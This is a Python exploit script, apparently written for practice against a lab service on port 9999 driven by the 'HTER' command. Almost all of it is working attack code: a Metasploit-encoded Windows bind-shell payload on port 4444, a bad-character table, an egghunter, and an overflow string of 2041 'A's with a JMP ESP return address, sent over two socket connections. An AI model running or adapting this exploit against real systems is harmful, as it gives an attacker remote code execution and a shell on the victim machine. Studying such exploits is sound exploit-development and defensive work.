#!/usr/bin/python

import socket
import os
import sys
import time

host="172.16.155.133"
port=9999

# msfpayload windows/shell_bind_tcp lport=4444 R | msfencode -b '\x00\x0a\x0d\x20' -t c
buf2=("\xdd\xc4\xb8\x54\x91\x67\x9c\xd9\x74\x24\xf4\x5b\x33\xc9\xb1"
"\x56\x31\x43\x18\x83\xeb\xfc\x03\x43\x40\x73\x92\x60\x80\xfa"
"\x5d\x99\x50\x9d\xd4\x7c\x61\x8f\x83\xf5\xd3\x1f\xc7\x58\xdf"
"\xd4\x85\x48\x54\x98\x01\x7e\xdd\x17\x74\xb1\xde\x99\xb8\x1d"
"\x1c\xbb\x44\x5c\x70\x1b\x74\xaf\x85\x5a\xb1\xd2\x65\x0e\x6a"
"\x98\xd7\xbf\x1f\xdc\xeb\xbe\xcf\x6a\x53\xb9\x6a\xac\x27\x73"
"\x74\xfd\x97\x08\x3e\xe5\x9c\x57\x9f\x14\x71\x84\xe3\x5f\xfe"
"\x7f\x97\x61\xd6\xb1\x58\x50\x16\x1d\x67\x5c\x9b\x5f\xaf\x5b"
"\x43\x2a\xdb\x9f\xfe\x2d\x18\xdd\x24\xbb\xbd\x45\xaf\x1b\x66"
"\x77\x7c\xfd\xed\x7b\xc9\x89\xaa\x9f\xcc\x5e\xc1\xa4\x45\x61"
"\x06\x2d\x1d\x46\x82\x75\xc6\xe7\x93\xd3\xa9\x18\xc3\xbc\x16"
"\xbd\x8f\x2f\x43\xc7\xcd\x27\xa0\xfa\xed\xb7\xae\x8d\x9e\x85"
"\x71\x26\x09\xa6\xfa\xe0\xce\xc9\xd1\x55\x40\x34\xd9\xa5\x48"
"\xf3\x8d\xf5\xe2\xd2\xad\x9d\xf2\xdb\x78\x31\xa3\x73\xd2\xf2"
"\x13\x34\x82\x9a\x79\xbb\xfd\xbb\x81\x11\x88\xfb\x4f\x41\xd9"
"\x6b\xb2\x75\xcc\x37\x3b\x93\x84\xd7\x6d\x0b\x30\x1a\x4a\x84"
"\xa7\x65\xb8\xb8\x70\xf2\xf4\xd6\x46\xfd\x04\xfd\xe5\x52\xac"
"\x96\x7d\xb9\x69\x86\x82\x94\xd9\xc1\xbb\x7f\x93\xbf\x0e\xe1"
"\xa4\x95\xf8\x82\x37\x72\xf8\xcd\x2b\x2d\xaf\x9a\x9a\x24\x25"
"\x37\x84\x9e\x5b\xca\x50\xd8\xdf\x11\xa1\xe7\xde\xd4\x9d\xc3"
"\xf0\x20\x1d\x48\xa4\xfc\x48\x06\x12\xbb\x22\xe8\xcc\x15\x98"
"\xa2\x98\xe0\xd2\x74\xde\xec\x3e\x03\x3e\x5c\x97\x52\x41\x51"
"\x7f\x53\x3a\x8f\x1f\x9c\x91\x0b\x2f\xd7\xbb\x3a\xb8\xbe\x2e"
"\x7f\xa5\x40\x85\xbc\xd0\xc2\x2f\x3d\x27\xda\x5a\x38\x63\x5c"
"\xb7\x30\xfc\x09\xb7\xe7\xfd\x1b")


badchars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")

egg = "6681caff0f42526a0258cd2e3c055a74efb8543030578bfaaf75eaaf75e7ffe7"

#77D3E6E7   JMP ESP
junk = "HTER " + "A"*(2041) + "e7e6d377" + "9090909090" + egg       #+ "T00WT00W" + badchars

expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send(junk)
expl.close()

time.sleep(1)
expl = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
expl.connect((host, port))
expl.send("HTER T00WT00W"+buf2)
expl.close()